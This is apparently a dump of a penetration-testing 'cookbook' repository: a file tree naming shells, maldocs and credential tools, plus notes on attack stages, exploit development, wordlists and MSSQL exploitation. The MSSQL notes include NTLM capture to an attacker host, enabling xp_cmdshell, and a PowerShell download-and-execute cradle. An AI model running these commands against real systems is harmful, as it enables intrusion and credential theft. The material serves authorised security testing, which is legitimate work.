├── .gitignore ├── Notes.Checklist.txt ├── Notes.Exploits.txt ├── Notes.Helpers.txt ├── Notes.Wordlists.txt ├── README.md ├── Target.Host.OS.Linux.txt ├── Target.Host.OS.Shells.txt ├── Target.Host.OS.Windows.txt ├── Target.Host.Service.AD.txt ├── Target.Host.Service.AMQP.txt ├── Target.Host.Service.DB.MSSQL.txt ├── Target.Host.Service.DB.MySQL.txt ├── Target.Host.Service.DB.PostgreSQL.txt ├── Target.Host.Service.FTP.txt ├── Target.Host.Service.HTTP.txt ├── Target.Host.Service.IDENT.txt ├── Target.Host.Service.LDAP.txt ├── Target.Host.Service.MSRPC.txt ├── Target.Host.Service.NFS.txt ├── Target.Host.Service.POP3.txt ├── Target.Host.Service.RDP.txt ├── Target.Host.Service.RPC.txt ├── Target.Host.Service.SMB.txt ├── Target.Host.Service.SMTP.txt ├── Target.Host.Service.SNMP.txt ├── Target.Host.Service.SSH.txt ├── Target.Host.Service.TELNET.txt ├── Target.Host.Service.VNC.txt ├── Target.Host.Service.X11.txt ├── Target.Network.Pivoting.txt ├── Target.Network.Scanning.txt ├── Target.Network.Wireless.txt ├── Target.Recon.DNS.txt ├── Target.Recon.Dorks.txt ├── Target.Recon.OSINT.txt ├── bin ├── direnum_combo.sh ├── dns_cnames.sh ├── dns_resolve.sh ├── dns_transfer.sh ├── download_files.sh ├── download_int.sh ├── ftp_server.py ├── hexdecode.py ├── hexreverse.py ├── http_codes.sh ├── httpd.py ├── mac_oui.sh ├── mitm_toolkit.py ├── parse_gnmap.sh ├── ping.py ├── ping.sh ├── quote.py ├── scan_top.sh ├── snmp_enum.sh ├── snmp_public_hosts.sh ├── ssh_enum_malform.py ├── ssh_enum_time.py ├── tomcat_brute.py ├── vba_format.py ├── vbe_decoder.py └── xor.py └── snippets ├── html └── smuggling.html ├── java ├── shells │ ├── reverse │ │ ├── reverse.jsp │ │ ├── reverse_bash.java │ │ └── reverse_php.java │ └── web │ │ └── webshell.jsp └── utils │ └── jenkins_console.groovy ├── linux ├── backdoors │ ├── ssh_reconnect.sh │ ├── suid_popen.c │ └── suid_shell.c ├── maldocs │ └── runner-1.c ├── shells │ ├── bind │ │ └── udp.sh │ └── reverse │ │ ├── reverse.c │ │ └── reverse.pl └── utils │ ├── bruteforce.sh │ ├── ld_preload.c │ ├── persistence.py │ ├── port_scanning1.sh │ ├── ps_monitoring.sh │ ├── python_pickle.py │ └── so_injection.c ├── php └── recursive_dir.php ├── python └── port_scanning.py ├── windows ├── maldocs │ ├── downloader-1.cs │ ├── downloader-1.js │ ├── downloader-1.ps1 │ ├── downloader-1.vba │ ├── downloader-1.vbs │ ├── downloader-1.xls │ ├── downloader-2.js │ ├── downloader-2.vba │ ├── evasion-1.cs │ ├── evasion-1.hta │ ├── evasion-1.inf │ ├── evasion-1.sct │ ├── evasion-1.url │ ├── evasion-1.wsf │ ├── evasion-2.hta │ ├── evasion-2.inf │ ├── evasion-2.sct │ ├── evasion-msxml.xml │ ├── evasion-msxml.xsl │ ├── ntlm-1.url │ ├── ntlm-evasion-mssql-1.csproj │ ├── runner-1.cs │ ├── runner-1.ps1 │ └── runner-1.vba ├── shells │ ├── bind │ │ ├── PortListener.ps1 │ │ ├── web1.asp │ │ ├── web2.asp │ │ ├── web3.asp │ │ └── web4.aspx │ └── reverse │ │ ├── reverse1.bat │ │ ├── reverse1.cpp │ │ ├── reverse1.cs │ │ ├── reverse1.ps1 │ │ ├── reverse2.cpp │ │ ├── reverse2.ps1 │ │ └── reverse_dll.c └── utils │ ├── DomainPasswordSpray.ps1 │ ├── Enable-Privilege.ps1 │ ├── GrabAndRun.ps1 │ ├── Invoke-Mimikatz-latest.ps1 │ ├── PortScanning.ps1 │ ├── Self-Elevate.ps1 │ ├── SharingIsCaring.ps1 │ ├── Start-WebServer.ps1 │ ├── SuperPing.ps1 │ ├── Win10FirewallRules.ps1 │ ├── WindowsEnum.ps1 │ ├── base64.vbs │ ├── ftp.bat │ ├── icacls.bat │ ├── info.aspx │ ├── mimikatz-Invoke-Mimikatz-obfuscate.sh │ ├── mimikatz-clone-obfuscated.sh │ ├── minidump.cs │ ├── run_bat.c │ ├── run_dll1.c │ ├── run_dll2.cpp │ ├── runas1.bat │ ├── runas2.bat │ ├── schcheck.bat │ ├── tcpwrecovery.py │ ├── update_invoke_mimikatz.py │ ├── useradd.c │ ├── wget_ps1.bat │ ├── wget_vbs.bat │ └── winscppassword.py └── xml └── xee.txt /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | -------------------------------------------------------------------------------- /Notes.Checklist.txt: -------------------------------------------------------------------------------- 1 | -- Source: https://github.com/0xRadi/OWASP-Web-Checklist 2 | 3 | `` Steps 4 | 5 | - Malware Injection (Spear-Phish, Web Exploits, etc) 6 | - Reconnaissance (Internal) 7 | - Credential Theft 8 | - Exploitation & Privilege Escalation 9 | - Data Access & Exfiltration 10 | - Persistence (retaining access) 11 | 12 | `` Persistence 13 | 14 | - Process injection 15 | - Binary patching 16 | - Valid user accounts 17 | - Vulnerable script code 18 | - Avoid port binding 19 | - Use AT to run your commands 20 | - Good rootkit 21 | - Be noisy on one to divert attention from another 22 | - Change strategies to match environment's normal behavior 23 | 24 | `` Reconnaissance 25 | 26 | - Manually explore the site 27 | - Spider/crawl for missed or hidden content 28 | - Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store 29 | - Check the caches of major search engines for publicly accessible sites 30 | - Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler) 31 | - Perform Web Application Fingerprinting 32 | - Identify technologies used 33 | - Identify user roles 34 | - Identify application entry points 35 | - Identify client-side code 36 | - Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services) 37 | - Identify co-hosted and related applications 38 | - Identify all hostnames and ports 39 | - Identify third-party hosted content 40 | 41 | `` Configuration 42 | 43 | - Check for commonly used application and administrative URLs 44 | - Check for old, backup and unreferenced files 45 | - Check HTTP methods supported and Cross Site Tracing (XST) 46 | - Test file extensions handling 47 | - Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS) 48 | - Test for policies (e.g. Flash, Silverlight, robots) 49 | - Test for non-production data in live environment, and vice-versa 50 | - Check for sensitive data in client-side code (e.g. API keys, - credentials) 51 | 52 | `` Transmission 53 | 54 | - Check SSL Version, Algorithms, Key length 55 | - Check for Digital Certificate Validity (Duration, Signature and - CN) 56 | - Check credentials only delivered over HTTPS 57 | - Check that the login form is delivered over HTTPS 58 | - Check session tokens only delivered over HTTPS 59 | - Check if HTTP Strict Transport Security (HSTS) in use 60 | 61 | `` Authentication 62 | 63 | - Test for user enumeration 64 | - Test for authentication bypass 65 | - Test for bruteforce protection 66 | - Test password quality rules 67 | - Test remember me functionality 68 | - Test for autocomplete on password forms/input 69 | - Test password reset and/or recovery 70 | - Test password change process 71 | - Test CAPTCHA 72 | - Test multi factor authentication 73 | - Test for logout functionality presence 74 | - Test for cache management on HTTP (eg Pragma, Expires, Max-age) 75 | - Test for default logins 76 | - Test for user-accessible authentication history 77 | - Test for out-of channel notification of account lockouts and successful password changes 78 | - Test for consistent authentication across applications with shared authentication schema / SSO 79 | 80 | `` Sessions 81 | 82 | - Establish how session management is handled in the application (eg, tokens in cookies, token in URL) 83 | - Check session tokens for cookie flags (httpOnly and secure) 84 | - Check session cookie scope (path and domain) 85 | - Check session cookie duration (expires and max-age) 86 | - Check session termination after a maximum lifetime 87 | - Check session termination after relative timeout 88 | - Check session termination after logout 89 | - Test to see if users can have multiple simultaneous sessions 90 | - Test session cookies for randomness 91 | - Confirm that new session tokens are issued on login, role change and logout 92 | - Test for consistent session management across applications with shared session management 93 | - Test for session puzzling 94 | - Test for CSRF and clickjacking 95 | 96 | `` Authorization 97 | 98 | - Test for path traversal 99 | - Test for bypassing authorization schema 100 | - Test for vertical Access control problems (a.k.a. Privilege Escalation) 101 | - Test for horizontal Access control problems (between two users at the same privilege level) 102 | - Test for missing authorization 103 | 104 | `` Validation 105 | 106 | - Test for Reflected Cross Site Scripting 107 | - Test for Stored Cross Site Scripting 108 | - Test for DOM based Cross Site Scripting 109 | - Test for Cross Site Flashing 110 | - Test for HTML Injection 111 | - Test for SQL Injection 112 | - Test for LDAP Injection 113 | - Test for ORM Injection 114 | - Test for XML Injection 115 | - Test for XXE Injection 116 | - Test for SSI Injection 117 | - Test for XPath Injection 118 | - Test for XQuery Injection 119 | - Test for IMAP/SMTP Injection 120 | - Test for Code Injection 121 | - Test for Expression Language Injection 122 | - Test for Command Injection 123 | - Test for Overflow (Stack, Heap and Integer) 124 | - Test for Format String 125 | - Test for incubated vulnerabilities 126 | - Test for HTTP Splitting/Smuggling 127 | - Test for HTTP Verb Tampering 128 | - Test for Open Redirection 129 | - Test for Local File Inclusion 130 | - Test for Remote File Inclusion 131 | - Compare client-side and server-side validation rules 132 | - Test for NoSQL injection 133 | - Test for HTTP parameter pollution 134 | - Test for auto-binding 135 | - Test for Mass Assignment 136 | - Test for NULL/Invalid Session Cookie 137 | 138 | `` Denial of Service 139 | 140 | - Test for anti-automation 141 | - Test for account lockout 142 | - Test for HTTP protocol DoS 143 | - Test for SQL wildcard DoS 144 | 145 | `` Business Logic 146 | 147 | - Test for feature misuse 148 | - Test for lack of non-repudiation 149 | - Test for trust relationships 150 | - Test for integrity of data 151 | - Test segregation of duties 152 | 153 | `` Cryptography 154 | 155 | - Check if data which should be encrypted is not 156 | - Check for wrong algorithms usage depending on context 157 | - Check for weak algorithms usage 158 | - Check for proper use of salting 159 | - Check for randomness functions 160 | 161 | `` File Uploads 162 | 163 | - Test that acceptable file types are whitelisted 164 | - Test that file size limits, upload frequency and total file counts are defined and are enforced 165 | - Test that file contents match the defined file type 166 | - Test that all file uploads have Anti-Virus scanning in-place. 167 | - Test that unsafe filenames are sanitised 168 | - Test that uploaded files are not directly accessible within the web root 169 | - Test that uploaded files are not served on the same hostname/port 170 | - Test that files and other media are integrated with the authentication and authorisation schemas 171 | 172 | `` Payments 173 | 174 | - Test for known vulnerabilities and configuration issues on Web Server and Web Application 175 | - Test for default or guessable password 176 | - Test for non-production data in live environment, and vice-versa 177 | - Test for Injection vulnerabilities 178 | - Test for Buffer Overflows 179 | - Test for Insecure Cryptographic Storage 180 | - Test for Insufficient Transport Layer Protection 181 | - Test for Improper Error Handling 182 | - Test for all vulnerabilities with a CVSS v2 score > 4.0 183 | - Test for Authentication and Authorization issues 184 | - Test for CSRF 185 | 186 | `` HTML 5 187 | 188 | - Test Web Messaging 189 | - Test for Web Storage SQL injection 190 | - Check CORS implementation 191 | - Check Offline Web Application 192 | -------------------------------------------------------------------------------- /Notes.Exploits.txt: -------------------------------------------------------------------------------- 1 | `` Fuzzing 2 | 3 | # TODO: Upload phazz sources 4 | 5 | ~$ phazz.py fuzz -h VAR_TARGET_HOST -p 69 -n 100 -l 3000 -s tftp:read -m char -d 6 | ~$ phazz.py fuzz -h VAR_TARGET_HOST -p 80 -n 100 -l 3000 -s http:get -m ascii -d 7 | 8 | `` Debuggers 9 | 10 | `` ASLR check 11 | 12 | ~$ cat /proc/sys/kernel/randomize_va_space 13 | 14 | `` Binary security check 15 | 16 | ~$ checksec 17 | 18 | `` Disassembling 19 | 20 | ~$ echo -ne '\xd3\xfe\x86\x7c' | ndisasm -b32 - 21 | 22 | `` Payloads 23 | 24 | `` Test string (2700) 25 | 26 | test_payload = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9' 27 | 28 | `` Bad characters 29 | 30 | bad_characters = ( 31 | '\x00' 32 | '\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10' 33 | '\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20' 34 | '\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30' 35 | '\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40' 36 | '\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50' 37 | '\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60' 38 | '\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70' 39 | '\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80' 40 | '\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90' 41 | '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0' 42 | '\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0' 43 | '\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0' 44 | '\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0' 45 | '\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0' 46 | '\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0' 47 | '\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' 48 | ) 49 | 50 | http = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40" 51 | generic = "\x00\x0a\x0d\xff" 52 | ftp = "\x00\x0a\x0d\x2f\x5c" 53 | 54 | `` Pattern 55 | 56 | ~$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000 57 | 58 | ~$ phazz.py pattern -m ascii -l 2000 59 | 60 | `` Offset 61 | 62 | ~$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2000 -q 68433568 63 | 64 | ~$ phazz.py pattern -m ascii -l 2000 -q 68433568 65 | 66 | `` nasm 67 | 68 | ~$ /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 69 | nasm > jmp eax 70 | -------------------------------------------------------------------------------- /Notes.Wordlists.txt: -------------------------------------------------------------------------------- 1 | `` Passwords 2 | 3 | `` Fast bruteforcing with typical combinations and top lists 4 | 5 | - ~/lib/brutas/brutas-passwords-1-xxs.txt 6 | - /usr/share/seclists/Passwords/probable-v2-top1575.txt 7 | - /usr/share/seclists/Passwords/Common-Credentials/500-worst-passwords.txt 8 | 9 | `` Medium-weight, may generate too much traffic 10 | 11 | - ~/lib/brutas/brutas-passwords-2-xs.txt 12 | - ~/lib/brutas/brutas-passwords-3-s.txt 13 | - /usr/share/seclists/Passwords/probable-v2-top12000.txt 14 | - /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt 15 | 16 | `` Heavy lists suitable for offline bruteforcing (> 300k) 17 | 18 | - ~/lib/brutas/brutas-passwords-4-m.txt 19 | - ~/lib/brutas/brutas-passwords-5-l.txt 20 | - ~/lib/brutas/brutas-passwords-6-xl.txt 21 | - /usr/share/seclists/Passwords/Leaked-Databases/md5decryptor-uk.txt 22 | 23 | `` Usernames 24 | 25 | - ~/lib/brutas/brutas-usernames-small.txt 26 | - ~/lib/brutas/brutas-usernames.txt 27 | - /usr/share/seclists/Usernames/top-usernames-shortlist.txt 28 | - /usr/share/wordlists/metasploit/unix_users.txt 29 | - /usr/share/seclists/Usernames/Names/names.txt 30 | 31 | `` Domains 32 | 33 | `` Light (< 4k) 34 | 35 | - ~/lib/brutas/brutas-subdomains-1-small.txt 36 | - /usr/share/seclists/Discovery/DNS/namelist.txt 37 | - /usr/share/dnsenum/dns.txt 38 | 39 | `` Heavy (> 100k) 40 | 41 | - ~/lib/brutas/brutas-subdomains-2-large.txt 42 | - /usr/share/seclists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt 43 | - /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 44 | - /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt 45 | 46 | `` Ports 47 | 48 | - ~/lib/brutas/brutas-ports-tcp-http.txt 49 | - ~/lib/brutas/brutas-ports-tcp-public.txt 50 | - ~/lib/brutas/brutas-ports-tcp-internal.txt 51 | - /usr/share/seclists/Discovery/Infrastructure/nmap-top1000-ports.txt 52 | 53 | `` HTTP paths 54 | 55 | - ~/lib/brutas/brutas-http-paths.txt 56 | - /usr/share/dirb/wordlists/common.txt 57 | - /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt 58 | - /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 59 | - /usr/share/wfuzz/wordlist/vulns/cgis.txt 60 | - /usr/share/seclists/Discovery/Web-Content/CGIs.txt 61 | - /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt 62 | - /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt 63 | 64 | `` HTTP parameters 65 | 66 | - ~/lib/brutas/brutas-http-params.txt 67 | - /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt 68 | 69 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # pentesting-cookbook 2 | 3 | > A set of recipes useful in pentesting and red teaming scenarios 4 | 5 | Snippets, code samples and hints used in penetration tests stored in a single repository so it can be quickly accessed and searched during the assessments. 6 | 7 | ## Structure 8 | 9 | - `bin` Handy utilities to be run locally 10 | - `snippets` All things useful to be run remotely, code snippets, examples etc 11 | - `Notes.*` All sort of helpers, lists and notes not necessarily related to specific service or stage 12 | - `Target.Host.OS.*` - Things that can be done once foothold is established 13 | - `Target.Host.Service.*` - Commands useful in enumeration and exploitation of particular service 14 | - `Target.Network.*` - Commands related to scanning and moving around networks 15 | - `Target.Recon.*` - Typical recon like DNS enumeration, OSINT etc. 16 | 17 | ## Formatting rules 18 | 19 | * If there are more than three levels of hierarchy the file needs to be split. 20 | * Sources (scripts) are located in the `snippets` directory (referenced by `@`). 21 | * Conventions: 22 | * `~` commands 23 | * `@` file references 24 | * `-` lists 25 | * `--` comments (above the commented line) 26 | * OS specific commands: 27 | * `~$` (Linux, defaults to Bash) 28 | * `~#` (Linux - root required) 29 | * `~>` (Windows) 30 | * Shell specific commands: 31 | * `~PS>` (Powershell) 32 | * Variables: 33 | * `VAR_ATTACKER_HOST` 34 | * `VAR_ATTACKER_PORT` 35 | * `VAR_TARGET_DOMAIN` 36 | * `VAR_TARGET_HOST` 37 | * `VAR_TARGET_PORT` 38 | * `VAR_TARGET_CIDR` 39 | * `VAR_TARGET_RANGE` 40 | * `VAR_TARGET_FILE` 41 | * `VAR_USERNAME` 42 | * `VAR_PASSWORD` 43 | * `VAR_NT_HASH` 44 | * `VAR_LM_HASH` (blank LM hash: aad3b435b51404eeaad3b435b51404ee) 45 | * `VAR_STRING` 46 | * `VAR_INTEGER` 47 | * `VAR_HEX` 48 | * `VAR_WORDLIST` 49 | * `VAR_WORDLIST_*` (`VAR_WORDLIST_USERNAME`, `VAR_WORDLIST_PASSWORD` etc) 50 | * `VAR_*_HOST` (`VAR_FTP_HOST`, `VAR_ZOMBIE_HOST`, `VAR_PROXY_HOST` etc) 51 | -------------------------------------------------------------------------------- /Target.Host.Service.AMQP.txt: -------------------------------------------------------------------------------- 1 | `` RabbitMQ 2 | 3 | ~$ nmap -Pn -sV -p 5672 --script amqp-info VAR_TARGET_HOST 4 | -------------------------------------------------------------------------------- /Target.Host.Service.DB.MSSQL.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap VAR_TARGET_HOST -v -p 1433 -sV -Pn -vv --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password,ms-sql-tables 4 | 5 | `` Password Bruteforcing 6 | 7 | ~$ nmap -p 1433 --script ms-sql-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD VAR_TARGET_HOST 8 | ~$ hydra -L VAR_WORDLIST_USER -V -P VAR_WORDLIST_PASSWORD VAR_TARGET_HOST mssql 9 | 10 | `` TDS Versions 11 | 12 | - 7.0 13 | - SQL Server 7.0 14 | - 7.1 15 | - SQL Server 2000 16 | - 7.1 Revision 1 17 | - SQL Server 2000 SP1 18 | - 7.2 19 | - SQL Server 2005 20 | - 7.3.A 21 | - SQL Server 2008 22 | - 7.3.B 23 | - SQL Server 2008 R2 24 | - 7.4 25 | - SQL Server 2012 26 | - SQL Server 2014 27 | - SQL Server 2016 28 | - SQL Server 2017 29 | - SQL Server 2019 30 | 31 | `` Remote console 32 | 33 | ~$ vim ~/.sqshrc 34 | ~$ sqsh -S mssql1 35 | 36 | `` Capturing NTLM 37 | 38 | > EXEC master..xp_dirtree "\\VAR_ATTACKER_HOST\\test"; 39 | 40 | `` Change sa password 41 | 42 | ~> net stop MSSQL$SQLEXPRESS 43 | ~> net start MSSQL$SQLEXPRESS /m sqlcmd 44 | ~> sqlcmd 45 | > ALTER LOGIN [sa] WITH DEFAULT_DATABASE=[master] 46 | > GO 47 | > USE [master] 48 | > GO 49 | > ALTER LOGIN [sa] WITH CHECK_POLICY = OFF; 50 | > GO 51 | > ALTER LOGIN [sa] WITH PASSWORD=N'sa'; 52 | > GO 53 | ~> net stop MSSQL$SQLEXPRESS 54 | ~> net start MSSQL$SQLEXPRESS 55 | 56 | `` Linked servers 57 | 58 | `` List 59 | 60 | > EXEC sp_linkedservers; 61 | 62 | `` Execute on linked server 63 | 64 | > SELECT version FROM OPENQUERY("VAR_TARGET_HOST", 'SELECT @@version AS version') 65 | 66 | `` Remote execution 67 | 68 | > EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT VAR_TARGET_HOST 69 | > EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT VAR_TARGET_HOST 70 | > EXEC ('xp_cmdshell ''whoami'';') AT VAR_TARGET_HOST 71 | 72 | `` With metasploit 73 | 74 | > use auxiliary/admin/mssql/mssql_sql 75 | > set USERNAME VAR_USERNAME 76 | > set PASSWORD VAR_PASSWORD 77 | > set DOMAIN VAR_DOMAIN 78 | > set USE_WINDOWS_AUTHENT yes 79 | > set RHOSTS VAR_TARGET_HOST 80 | > set SQL "EXEC master..xp_dirtree '\\\\VAR_ATTACKER_HOST\\test'" 81 | > run 82 | 83 | `` xp_cmdshell 84 | 85 | `` The basic approach 86 | 87 | > exec sp_configure "show advanced options", 1 88 | > reconfigure 89 | > exec sp_configure "xp_cmdshell", 1 90 | > reconfigure 91 | > xp_cmdshell "whoami" 92 | 93 | `` Download and execute PowerShell 94 | 95 | > xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://VAR_TARGET_HOST/script.ps1\");" 96 | 97 | `` wget.vbs 98 | 99 | xp_cmdshell 'echo strUrl = WScript.Arguments.Item(0) > wget.vbs' 100 | go 101 | xp_cmdshell 'echo StrFile = WScript.Arguments.Item(1) >> wget.vbs' 102 | go 103 | xp_cmdshell 